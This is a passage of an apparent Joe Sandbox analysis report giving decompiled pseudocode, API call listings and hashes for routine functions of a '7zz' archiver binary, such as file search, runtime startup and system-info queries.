                                                                      0x00417e6b
                                                                      0x00417e6b
                                                                      0x00000000
                                                                      0x00417e39
                                                                      0x00417ddc
                                                                      0x00417ddf
                                                                      0x00417de7
                                                                      0x00417dea
                                                                      0x00417df0
                                                                      0x00417dfb
                                                                      0x00000000
                                                                      0x00417dfb
                                                                      0x00417d79
                                                                      0x00417d7a
                                                                      0x00417d7d
                                                                      0x00417d80
                                                                      0x00417d86
                                                                      0x00417d90
                                                                      0x00000000
                                                                      0x00417d90
                                                                      0x00417d58
                                                                      0x00417d58
                                                                      0x00000000
                                                                      0x00417d58
                                                                      0x00417d07
                                                                      0x00417d0c
                                                                      0x00417d0e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00417d0e
                                                                      0x00417cdc
                                                                      0x00417ce0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00417ceb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00417c8d
                                                                      0x00417c8d
                                                                      0x00417c9f
                                                                      0x00417ca1
                                                                      0x00417cc9
                                                                      0x00417ca3
                                                                      0x00417cac
                                                                      0x00417caf
                                                                      0x00417cb5
                                                                      0x00417cc0
                                                                      0x00417cc0
                                                                      0x00417cce
                                                                      0x00417cd1
                                                                      0x00417cd2
                                                                      0x00417cd2
                                                                      0x00000000
                                                                      0x00417c8d
                                                                      0x00417c76
                                                                      0x00000000
                                                                      0x00417c0b
                                                                      0x00417c0b
                                                                      0x00417c0e
                                                                      0x00000000
                                                                      0x00417c12
                                                                      0x00417c16
                                                                      0x00417c22
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00417c29
                                                                      0x00417c29
                                                                      0x00417c2b
                                                                      0x00417c2d
                                                                      0x00417c36
                                                                      0x00417c3f
                                                                      0x00417c43
                                                                      0x00417c4b
                                                                      0x00417c4f
                                                                      0x00417c54
                                                                      0x00000000
                                                                      0x00417c18
                                                                      0x00417c1a
                                                                      0x00417c26
                                                                      0x00417c26
                                                                      0x00000000
                                                                      0x00417c1c
                                                                      0x00417c1d
                                                                      0x00000000
                                                                      0x00417c1d
                                                                      0x00417c1a

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID: !$000$001$R$Unknown error$a$c[@$exe$iso$r$rar$tI
                                                                      • API String ID: 3519838083-4101332242
                                                                      • Opcode ID: 206f97cf47abe644efdfadb335eb1742583df4d89bbfbb1961c776fc5318bc45
                                                                      • Instruction ID: ff5ff08527ddfe2bc4deabd4e0b21c70904ab096e5b089e9ffbf148357062f4e
                                                                      • Opcode Fuzzy Hash: 206f97cf47abe644efdfadb335eb1742583df4d89bbfbb1961c776fc5318bc45
                                                                      • Instruction Fuzzy Hash: 7552C030D04248DFCF15DFA5C8809EEBBB5AF48314F24846EE445AB391DB389A86CF59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040B174 Relevance: 7.6, APIs: 5, Instructions: 88fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1947 40b174-40b18e call 46b890 call 40b154 1952 40b194-40b19d 1947->1952 1953 40b27c-40b288 1947->1953 1954 40b20f-40b263 call 403532 AreFileApisANSI call 40822f FindFirstFileA call 407a18 * 2 1952->1954 1955 40b19f-40b1b7 FindFirstFileW 1952->1955 1959 40b273-40b279 1954->1959 1978 40b265-40b26e call 40b2ea 1954->1978 1957 40b1f9-40b1fd 1955->1957 1958 40b1b9-40b1dc call 401e9a call 40b863 1955->1958 1957->1959 1960 40b1ff-40b20d call 40b28b 1957->1960 1971 40b1ec-40b1f8 call 407a18 1958->1971 1972 40b1de-40b1ea FindFirstFileW 1958->1972 1959->1953 1960->1959 1971->1957 1972->1971 1978->1959
                                                                      C-Code - Quality: 84%
                                                                      			E0040B174(void** __ecx, void* __edi, void* __eflags) {
				signed int _t34;
				signed int _t36;
				void* _t47;
				void* _t53;
				void** _t77;
				void* _t79;
				intOrPtr _t86;

				E0046B890(0x473d64, _t79);
				_t77 = __ecx;
				_t34 = E0040B154(__ecx);
				if(_t34 == 0) {
					L11:
					 *[fs:0x0] =  *((intOrPtr*)(_t79 - 0xc));
					return _t34;
				}
				_t86 =  *0x490a7c; // 0x1
				if(_t86 == 0) {
					E00403532(_t79 - 0x24,  *(_t79 + 8));
					 *(_t79 - 4) = 1;
					_t36 = AreFileApisANSI();
					asm("sbb eax, eax");
					_push( ~_t36 + 1);
					 *_t77 = FindFirstFileA( *(E0040822F(_t79 - 0x30)), _t79 - 0x170);
					E00407A18( *((intOrPtr*)(_t79 - 0x30)));
					 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
					E00407A18( *((intOrPtr*)(_t79 - 0x24)));
					__eflags =  *_t77 - 0xffffffff;
					if(__eflags != 0) {
						E0040B2EA(_t79 - 0x170,  *((intOrPtr*)(_t79 + 0xc)), __eflags);
					}
					L10:
					_t34 = 0 |  *_t77 != 0xffffffff;
					goto L11;
				}
				_t47 = FindFirstFileW( *(_t79 + 8), _t79 - 0x3c0); // executed
				 *_t77 = _t47;
				if(_t47 != 0xffffffff) {
					L6:
					_t90 =  *_t77 - 0xffffffff;
					if( *_t77 != 0xffffffff) {
						E0040B28B(_t79 - 0x3c0,  *((intOrPtr*)(_t79 + 0xc)), _t90);
					}
					goto L10;
				}
				 *(_t79 - 0x18) = 0;
				 *((intOrPtr*)(_t79 - 0x14)) = 0;
				 *((intOrPtr*)(_t79 - 0x10)) = 0;
				E00401E9A(_t79 - 0x18, 3);
				 *(_t79 - 4) = 0;
				if(E0040B863(_t79 - 0x18) != 0) {
					_t53 = FindFirstFileW( *(_t79 - 0x18), _t79 - 0x3c0); // executed
					 *_t77 = _t53;
				}
				 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
				E00407A18( *(_t79 - 0x18));
				goto L6;
			}










                                                                      0x0040b179
                                                                      0x0040b185
                                                                      0x0040b187
                                                                      0x0040b18e
                                                                      0x0040b27c
                                                                      0x0040b280
                                                                      0x0040b288
                                                                      0x0040b288
                                                                      0x0040b197
                                                                      0x0040b19d
                                                                      0x0040b215
                                                                      0x0040b21a
                                                                      0x0040b221
                                                                      0x0040b229
                                                                      0x0040b232
                                                                      0x0040b24b
                                                                      0x0040b24d
                                                                      0x0040b255
                                                                      0x0040b259
                                                                      0x0040b25e
                                                                      0x0040b263
                                                                      0x0040b26e
                                                                      0x0040b26e
                                                                      0x0040b273
                                                                      0x0040b279
                                                                      0x00000000
                                                                      0x0040b279
                                                                      0x0040b1b0
                                                                      0x0040b1b5
                                                                      0x0040b1b7
                                                                      0x0040b1f9
                                                                      0x0040b1f9
                                                                      0x0040b1fd
                                                                      0x0040b208
                                                                      0x0040b208
                                                                      0x00000000
                                                                      0x0040b1fd
                                                                      0x0040b1be
                                                                      0x0040b1c1
                                                                      0x0040b1c4
                                                                      0x0040b1c7
                                                                      0x0040b1d2
                                                                      0x0040b1dc
                                                                      0x0040b1e8
                                                                      0x0040b1ea
                                                                      0x0040b1ea
                                                                      0x0040b1ef
                                                                      0x0040b1f3
                                                                      0x00000000

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 0040B179
                                                                        • Part of subcall function 0040B154: FindClose.KERNELBASE(00000000,?,0040B18C), ref: 0040B15F
                                                                      • FindFirstFileW.KERNELBASE(000000FF,?,?), ref: 0040B1B0
                                                                      • FindFirstFileW.KERNELBASE(00000002,?,00000003), ref: 0040B1E8
                                                                      • AreFileApisANSI.KERNEL32(000000FF), ref: 0040B221
                                                                      • FindFirstFileA.KERNEL32(?,?,00000001), ref: 0040B242
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$First$ApisCloseH_prolog
                                                                      • String ID:
                                                                      • API String ID: 4121580741-0
                                                                      • Opcode ID: f763ac5f82e435b8d6b012c7509676add0fd9d54bd021928ef73c32a673d885f
                                                                      • Instruction ID: fbd6ce0b626e89321ef8dbff40679b25df86b8bcd2a774ab2a160b2ca2317645
                                                                      • Opcode Fuzzy Hash: f763ac5f82e435b8d6b012c7509676add0fd9d54bd021928ef73c32a673d885f
                                                                      • Instruction Fuzzy Hash: F0316B3180020ADBCB15EFA4D8459EDBB78FF04324F20466EE461B72E1DB395A85CB98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0046CF4C Relevance: 3.1, APIs: 2, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 71%
                                                                      			_entry_(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				unsigned int _t8;
				intOrPtr _t18;
				intOrPtr _t19;
				signed int _t25;
				intOrPtr _t41;

				_t37 = __edi;
				_push(0xffffffff);
				_push(0x47c8a0);
				_push(E0046CE74);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t41;
				_push(__edi);
				_v28 = _t41 - 0x10;
				_t8 = GetVersion();
				 *0x4936fc = 0;
				_t25 = _t8 & 0x000000ff;
				 *0x4936f8 = _t25;
				 *0x4936f4 = _t25 << 8;
				 *0x4936f0 = _t8 >> 0x10;
				if(E0046EA66(_t25 << 8, 1) == 0) {
					E0046D061(0x1c);
				}
				if(E0046E31C() == 0) {
					E0046D061(0x10);
				}
				_v8 = _v8 & 0x00000000;
				E0046FCD7(); // executed
				 *0x49659c = GetCommandLineA();
				 *0x493670 = E00470AD6();
				E00470889();
				E004707D0();
				E0046E6C8();
				_t18 =  *0x49370c; // 0x22912d0
				 *0x493710 = _t18;
				_push(_t18);
				_push( *0x493704);
				_push( *0x493700); // executed
				_t19 = E00405C72(_v8); // executed
				_v32 = _t19;
				E0046E6F5(_t19);
				_v36 =  *((intOrPtr*)( *_v24));
				return E00470658(_t37, _v8,  *((intOrPtr*)( *_v24)), _v24);
			}













                                                                      0x0046cf4c
                                                                      0x0046cf4f
                                                                      0x0046cf51
                                                                      0x0046cf56
                                                                      0x0046cf61
                                                                      0x0046cf62
                                                                      0x0046cf6e
                                                                      0x0046cf6f
                                                                      0x0046cf72
                                                                      0x0046cf7c
                                                                      0x0046cf84
                                                                      0x0046cf8a
                                                                      0x0046cf95
                                                                      0x0046cf9e
                                                                      0x0046cfad
                                                                      0x0046cfb1
                                                                      0x0046cfb6
                                                                      0x0046cfbe
                                                                      0x0046cfc2
                                                                      0x0046cfc7
                                                                      0x0046cfc8
                                                                      0x0046cfcc
                                                                      0x0046cfd7
                                                                      0x0046cfe1
                                                                      0x0046cfe6
                                                                      0x0046cfeb
                                                                      0x0046cff0
                                                                      0x0046cff5
                                                                      0x0046cffa
                                                                      0x0046cfff
                                                                      0x0046d000
                                                                      0x0046d006
                                                                      0x0046d00c
                                                                      0x0046d014
                                                                      0x0046d018
                                                                      0x0046d024
                                                                      0x0046d030

                                                                      APIs
                                                                      • GetVersion.KERNEL32 ref: 0046CF72
                                                                        • Part of subcall function 0046EA66: HeapCreate.KERNELBASE(00000000,00001000,00000000,0046CFAA,00000001), ref: 0046EA77
                                                                        • Part of subcall function 0046EA66: HeapDestroy.KERNEL32 ref: 0046EAB6
                                                                      • GetCommandLineA.KERNEL32 ref: 0046CFD1
                                                                        • Part of subcall function 0046D061: ExitProcess.KERNEL32 ref: 0046D07E
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CommandCreateDestroyExitLineProcessVersion
                                                                      • String ID:
                                                                      • API String ID: 1387771204-0
                                                                      • Opcode ID: fd750bc3cd7585849bbac3ab2b54539f5ca51bea4ec0c39904099df9b32006d9
                                                                      • Instruction ID: 870f0fd66317059e0ff95abc7fdc162525e316738eefe618a921cd101cb68cd4
                                                                      • Opcode Fuzzy Hash: fd750bc3cd7585849bbac3ab2b54539f5ca51bea4ec0c39904099df9b32006d9
                                                                      • Instruction Fuzzy Hash: EF2105F0940201AFE718BFA2DC42B7A7BA4EB26715F00413FF404A63A1EB3C49008B5E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040C5F4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E0040C5F4() {
				struct _SYSTEM_INFO _v40;

				GetSystemInfo( &_v40); // executed
				return _v40.dwNumberOfProcessors;
			}




                                                                      0x0040c5fe
                                                                      0x0040c608

                                                                      APIs
                                                                      • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,004012EC,00000000,00000000,00490AB0), ref: 0040C5FE
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: InfoSystem
                                                                      • String ID:
                                                                      • API String ID: 31276548-0
                                                                      • Opcode ID: 1c5c9b3bbc459ceaa168d8dbf2743ba381f88a3378da8e3fc4aaaada2f7fab74
                                                                      • Instruction ID: 2873cf6bad21c2a51a49be2c119f9dc910efd3d225da868e7d860f0ff405fddb
                                                                      • Opcode Fuzzy Hash: 1c5c9b3bbc459ceaa168d8dbf2743ba381f88a3378da8e3fc4aaaada2f7fab74
                                                                      • Instruction Fuzzy Hash: 2DC09B74D0420D97CB00E7E5D94E88E77FCE748105F400461D515E3141E670F99587E6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0046E6AA Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E0046E6AA() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0046E664); // executed
				 *0x4936e8 = _t1;
				return _t1;
			}




                                                                      0x0046e6af
                                                                      0x0046e6b5
                                                                      0x0046e6ba

                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNELBASE(Function_0006E664), ref: 0046E6AF
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: c7f1619ac543780bbf34eb8e95484e4113401968d6038d2ffaa388747d46fa77
                                                                      • Instruction ID: a5106b7f6ad9fc50672dff64106b0fe435b0594dc7b9e21cd679f57e89e9b924
                                                                      • Opcode Fuzzy Hash: c7f1619ac543780bbf34eb8e95484e4113401968d6038d2ffaa388747d46fa77
                                                                      • Instruction Fuzzy Hash: 56A012745013009A82105F10A8084083A50A260A037500036500040210D6700494490B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004264F7 Relevance: 32.4, APIs: 16, Strings: 2, Instructions: 904COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 86%
                                                                      			E004264F7(signed int __ecx, void* __edx, void* __eflags) {
				signed int _t469;
				signed int _t480;
				signed int _t494;
				intOrPtr* _t514;
				signed int _t516;
				signed int _t519;
				signed int _t520;
				signed int _t525;
				signed int _t530;
				signed int _t531;
				intOrPtr* _t542;
				intOrPtr* _t543;
				signed int _t557;
				signed int _t567;
				signed int _t568;
				signed int _t571;
				void* _t580;
				intOrPtr* _t582;
				signed int _t584;
				signed int _t586;
				signed int _t587;
				signed int _t601;
				signed int _t602;
				signed int _t610;
				signed int _t611;
				signed int _t612;
				signed int _t619;
				signed int _t630;
				signed int _t631;
				signed int _t632;
				signed int _t638;
				signed int _t652;
				signed int _t653;
				signed int _t655;
				signed int _t656;
				signed char _t658;
				signed int _t660;
				signed int _t661;
				signed char _t665;
				signed int _t673;
				intOrPtr _t714;
				intOrPtr _t715;
				signed char* _t723;
				intOrPtr* _t729;
				char _t752;
				signed int _t765;
				signed int _t795;
				signed int* _t828;
				signed int _t830;
				intOrPtr _t832;
				signed int* _t835;
				signed int _t836;
				signed int _t837;
				signed int _t838;
				intOrPtr* _t839;
				intOrPtr* _t840;
				intOrPtr _t842;
				signed int _t843;
				signed int _t844;
				void* _t845;
				intOrPtr* _t846;
				signed char* _t847;
				void* _t849;

				E0046B890(E00476819, _t849);
				_t832 =  *((intOrPtr*)(_t849 + 0x18));
				_t828 = __ecx;
				 *(_t849 - 0x14) = __ecx;
				if(E0042CD7D(_t832) == 0) {
					L83:
					_t469 = 0x80004001;
					goto L134;
				} else {
					_t673 = 0;
					 *((char*)( *((intOrPtr*)(_t849 + 0x28)))) = 0;
					E00405B9F(_t849 - 0x38);
					 *((intOrPtr*)(_t849 - 0x38)) = 0x47b208;
					 *(_t849 - 4) = 0;
					 *((intOrPtr*)(_t849 - 0x5c)) = 0;
					L00467C60(_t849 - 0x58);
					 *(_t849 - 4) = 1;
					E0040C9B4(_t849 - 0x5c,  *(_t849 + 8));
					 *(_t849 - 0x10) = 0;
					if( *((intOrPtr*)(_t832 + 0x30)) <= 0) {
						 *((intOrPtr*)(_t849 - 0x3c)) =  *((intOrPtr*)( *((intOrPtr*)(_t849 + 0x18)) + 8));
						E004264A2(_t849 - 0x108);
						 *(_t849 - 4) = 4;
						E00427466(_t849 - 0xb8);
						 *(_t849 - 4) = 5;
						E00427107( *((intOrPtr*)(_t849 + 0x18)), _t849 - 0x108);
						__eflags =  *_t828;
						if( *_t828 == 0) {
							L12:
							E0040862D();
							_t480 = _t828[0x1d];
							_t835 =  &(_t828[0x1d]);
							__eflags = _t480 - _t673;
							if(_t480 != _t673) {
								 *((intOrPtr*)( *_t480 + 8))(_t480);
								 *_t835 = _t673;
							}
							__eflags = _t828[0x1a] - _t673;
							if(_t828[0x1a] != _t673) {
								_push(0x88); // executed
								_t652 = E004079F2(); // executed
								 *(_t849 + 8) = _t652;
								__eflags = _t652 - _t673;
								 *(_t849 - 4) = 6;
								if(_t652 == _t673) {
									_t653 = 0;
									__eflags = 0;
								} else {
									_t653 = E0042732B(_t652);
								}
								 *(_t849 - 4) = 5;
								_t828[0x1b] = _t653;
								E0040C9B4(_t835, _t653);
								_t655 = _t828[0x1b];
								__eflags = _t655 - _t673;
								if(_t655 == _t673) {
									_t656 = 0;
									__eflags = 0;
								} else {
									_t656 = _t655 + 4;
								}
								_t828[0x1c] = _t656;
							}
							_t836 =  *((intOrPtr*)( *(_t828[0x1c])))(_t849 - 0x108);
							__eflags = _t836 - _t673;
							if(_t836 == _t673) {
								__eflags =  *((intOrPtr*)(_t849 - 0x3c)) - _t673;
								 *(_t849 - 0x18) = _t673;
								if(__eflags <= 0) {
									L41:
									E0042743A( &(_t828[1]), __eflags, _t849 - 0x108);
									 *_t828 = 1;
									goto L42;
								} else {
									while(1) {
										_t846 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t849 + 0x18)) + 0xc)) +  *(_t849 - 0x18) * 4));
										 *(_t849 + 0x10) = _t673;
										 *(_t849 + 8) = _t673;
										_push(_t673);
										_push( *((intOrPtr*)(_t846 + 4)));
										 *(_t849 - 4) = 0xa;
										_push( *_t846); // executed
										_t610 = E0040C914(_t849 + 0x10, _t849 + 8, __eflags); // executed
										__eflags = _t610 - _t673;
										 *(_t849 - 0x1c) = _t610;
										if(_t610 != _t673) {
											break;
										}
										 *(_t849 - 0x10) = _t673;
										__eflags =  *((intOrPtr*)(_t846 + 0x14)) - 1;
										 *(_t849 - 4) = 0xd;
										if( *((intOrPtr*)(_t846 + 0x14)) != 1) {
											L31:
											__eflags =  *(_t849 + 8) - _t673;
											if( *(_t849 + 8) == _t673) {
												_t619 =  *(_t849 + 0x10);
												 *(_t849 - 4) = 5;
												__eflags = _t619 - _t673;
												if(_t619 != _t673) {
													 *((intOrPtr*)( *_t619 + 8))(_t619);
												}
												 *(_t849 - 4) = 0x10;
												E00408604(_t849 - 0xb8);
												 *(_t849 - 4) = 1;
												E00423635(_t849 - 0x108, __eflags);
												 *(_t849 - 4) = _t673;
												DeleteCriticalSection(_t849 - 0x58);
												E0043361B(_t849 - 0x5c);
												 *((intOrPtr*)(_t849 - 0x38)) = 0x47b208;
												 *(_t849 - 4) = 0x11;
												E0040862D();
												_t266 = _t849 - 4;
												 *_t266 =  *(_t849 - 4) | 0xffffffff;
												__eflags =  *_t266;
												E00408604(_t849 - 0x38);
												goto L83;
											} else {
												E0040C9B4(_t849 - 0x10,  *(_t849 + 8));
												__eflags = _t828[0x1a] - _t673;
												if(__eflags != 0) {
													L00423E7F(_t828[0x1b], _t849, __eflags,  *(_t849 + 8));
												}
												goto L34;
											}
										} else {
											__eflags =  *((intOrPtr*)(_t846 + 0x18)) - 1;
											if( *((intOrPtr*)(_t846 + 0x18)) != 1) {
												goto L31;
											} else {
												_t795 =  *(_t849 + 0x10);
												__eflags = _t795 - _t673;
												if(_t795 == _t673) {
													_t638 =  *(_t849 + 8);
													 *(_t849 - 4) = 9;
													__eflags = _t638 - _t673;
													if(_t638 != _t673) {
														 *((intOrPtr*)( *_t638 + 8))(_t638);
														_t795 =  *(_t849 + 0x10);
													}
													__eflags = _t795 - _t673;
													 *(_t849 - 4) = 5;
													if(_t795 != _t673) {
														 *((intOrPtr*)( *_t795 + 8))(_t795);
													}
													 *(_t849 - 4) = 0xe;
													E00408604(_t849 - 0xb8);
													 *(_t849 - 4) = 1;
													E00423635(_t849 - 0x108, __eflags);
													 *(_t849 - 4) = _t673;
													DeleteCriticalSection(_t849 - 0x58);
													E0043361B(_t849 - 0x5c);
													 *((intOrPtr*)(_t849 - 0x38)) = 0x47b208;
													 *(_t849 - 4) = 0xf;
													goto L79;
												} else {
													E0040C9B4(_t849 - 0x10, _t795);
													__eflags = _t828[0x1a] - _t673;
													if(__eflags != 0) {
														L00423E5A(_t828[0x1b], _t849, __eflags,  *(_t849 + 0x10));
													}
													L34:
													_push(_t849 - 0x10);
													E0042757B( &(_t828[0x1e]));
													_t630 =  *(_t849 - 0x10);
													 *(_t849 - 4) = 0xa;
													__eflags = _t630 - _t673;
													if(_t630 != _t673) {
														 *((intOrPtr*)( *_t630 + 8))(_t630);
													}
													_t631 =  *(_t849 + 8);
													 *(_t849 - 4) = 9;
													__eflags = _t631 - _t673;
													if(_t631 != _t673) {
														 *((intOrPtr*)( *_t631 + 8))(_t631);
													}
													_t632 =  *(_t849 + 0x10);
													 *(_t849 - 4) = 5;
													__eflags = _t632 - _t673;
													if(_t632 != _t673) {
														 *((intOrPtr*)( *_t632 + 8))(_t632);
													}
													 *(_t849 - 0x18) =  *(_t849 - 0x18) + 1;
													__eflags =  *(_t849 - 0x18) -  *((intOrPtr*)(_t849 - 0x3c));
													if(__eflags < 0) {
														continue;
													} else {
														goto L41;
													}
												}
											}
										}
										goto L134;
									}
									_t611 =  *(_t849 + 8);
									 *(_t849 - 4) = 9;
									__eflags = _t611 - _t673;
									if(_t611 != _t673) {
										 *((intOrPtr*)( *_t611 + 8))(_t611);
									}
									_t612 =  *(_t849 + 0x10);
									 *(_t849 - 4) = 5;
									__eflags = _t612 - _t673;
									if(_t612 != _t673) {
										 *((intOrPtr*)( *_t612 + 8))(_t612);
									}
									 *(_t849 - 4) = 0xb;
									E00408604(_t849 - 0xb8);
									 *(_t849 - 4) = 1;
									E00423635(_t849 - 0x108, __eflags);
									 *(_t849 - 4) = _t673;
									DeleteCriticalSection(_t849 - 0x58);
									E0043361B(_t849 - 0x5c);
									 *((intOrPtr*)(_t849 - 0x38)) = 0x47b208;
									_t838 =  *(_t849 - 0x1c);
									 *(_t849 - 4) = 0xc;
									goto L123;
								}
							} else {
								 *(_t849 - 4) = 7;
								E00408604(_t849 - 0xb8);
								 *(_t849 - 4) = 1;
								E00423635(_t849 - 0x108, __eflags);
								 *(_t849 - 4) = _t673;
								DeleteCriticalSection(_t849 - 0x58);
								E0043361B(_t849 - 0x5c);
								 *((intOrPtr*)(_t849 - 0x38)) = 0x47b208;
								 *(_t849 - 4) = 8;
								_t673 = _t836;
								goto L129;
							}
						} else {
							_t658 = E0042721E(_t849 - 0x108,  &(_t828[1]));
							asm("sbb al, al");
							_t660 =  ~_t658 + 1;
							__eflags = _t660;
							 *(_t849 + 0xb) = _t660;
							if(_t660 == 0) {
								L42:
								 *((intOrPtr*)( *(_t828[0x1c]) + 4))();
